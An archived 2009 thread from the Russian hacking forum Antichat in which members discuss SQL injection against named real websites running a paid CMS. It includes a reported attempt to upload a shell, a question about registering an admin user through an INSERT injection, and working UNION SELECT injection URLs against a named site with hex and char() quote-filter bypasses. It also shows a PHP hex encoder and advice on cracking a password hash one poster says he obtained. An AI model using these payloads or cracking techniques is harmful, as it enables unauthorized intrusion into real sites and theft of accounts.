ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.02.2009, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Сообщение от jokester
Можно и так, но есть способ лучше 
Заходим в админку:
http://www.travelwings.ru/admin/login.php
Видим вверху надпись:
Citrus CMS v2.0
Гуглим и находим офф сайт этой цмс:
http://citrus-soft.ru
Видим. что она платная, значит с кодом обламываемся , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.
|
|
|
18.02.2009, 17:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от groundhog
Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.
Вообще-то я об этом и писал, в портфолио тоже есть и пятая ветка , и рут, но видимо админы не дремлют(я полагаю туда народ ломанулся толпой ), т.к. сейчас у меня тоже запрос не проходит
|
|
|
|
18.02.2009, 22:53
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
есть иньекция после insert в поле регистрации, потом форма регистрации записывается в табличку с пользователями, можно ли достроить запрос, что бы зарегистрировать юзера с правами админа? что вообще можно с этой инъекцией сделать?
зарание спасибо)
Последний раз редактировалось pinky07; 18.02.2009 в 22:57..
|
|
|
|
18.02.2009, 23:15
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
pinky07, http://www.cyberguru.ru/database/sql/sql-injections-page5.html
|
|
|
|
19.02.2009, 02:42
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Тепер вопрос . база mysql5 . но филтруеца ' .. при током запросе идёт филтер ....
COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1+--
ww~w.so-znanie.co~m/index.php?id=-2+union+select+1,2,3+--
както обоити мозно?
Помогите новичку . штоб не флюдить мозна и в ПМ
|
|
|
|
19.02.2009, 02:48
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Ну тогда то что в кавычках пытаешься подать - захексируй.. в hex
Вот атк
PHP код:
<?php
set_time_limit(0);
$form = <<<FORM
<form method="post" action="">
<textarea name="txt" rows="20" cols="100"></textarea>
<input type="submit" name="ok">
</form>
FORM;
if ($_POST['txt'] and $_POST['ok']){
$my_url=$_POST['txt'];
$strlength = strlen($my_url);
for($i=0; $i<$strlength; $i++){
$returnval .= dechex(ord(substr($my_url, $i, 1)));
}
echo '0x' . $returnval;
}else{
echo $form;
}
?>
Последний раз редактировалось попугай; 19.02.2009 в 02:54..
|
|
|
|
19.02.2009, 03:00
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
2 попугай
я нечего непонел из етого пхп кода .... я нерозбераюс в нём вопше . если нетрудно мош поподробние в пм скинут
и есё вопросик . где мозно раскодироват парол от логина... просто узнал парол от аккаунта а он в кодирофке
5870dc3ee770e65bb1a4a267f7c4fc6e
|
|
|
|
19.02.2009, 05:16
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
и есё вопросик . где мозно раскодироват парол от логина... просто узнал парол от аккаунта а он в кодирофке
5870dc3ee770e65bb1a4a267f7c4fc6e
Это md5
расшифровать можно здесь: https://forum.antichat.ru/threadnav83865-1-10.html
и здесь: https://hashcracking.info/
и здесь: http://www.google.ru/search?hl=ru&q=md5+online+cracker
или с помощью ПО, рекомендую PasswordsPro от InsidePro
|
|
|
|
19.02.2009, 05:30
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Saiga
2 попугай
я нечего непонел из етого пхп кода .... я нерозбераюс в нём вопше . если нетрудно мош
Подробнее:
Если хотим посмотреть колонки в таблице, но кавычки фильтруются, то таблицу кодируют.
Кодируем в hex.
Код:
http://so-znanie.com/index.php?id=-2+union+select+1,2,column_name+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x61646d696e73+limit+0,1--
Где, 0x61646d696e73 - таблица admins.
Закодировать можно например на этом сайте - http://x3k.ru (SQL Hex)
При переводе в hex - кавычки не использовать.
|
|
|
|
19.02.2009, 11:40
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Сообщение от R1dex
Подробнее:
Если хотим посмотреть колонки в таблице, но кавычки фильтруются, то таблицу кодируют.
Кодируем в hex.
Код:
http://so-znanie.com/index.php?id=-2+union+select+1,2,column_name+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x61646d696e73+limit+0,1--
Где, 0x61646d696e73 - таблица admins.
Закодировать можно например на этом сайте - http://x3k.ru (SQL Hex)
При переводе в hex - кавычки не использовать. можно еще через чар, получится так:
Код:
http://site.com/index.php?id=-2+union+select+1,2,column_name+from+information_schema.columns+profiling+where+table_name+LIKE+char(97,100,109,105,110,115)+limit+0,1--
где char(97,100,109,105,110,115) = admins
Последний раз редактировалось f1ng3r; 19.02.2009 в 11:50..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
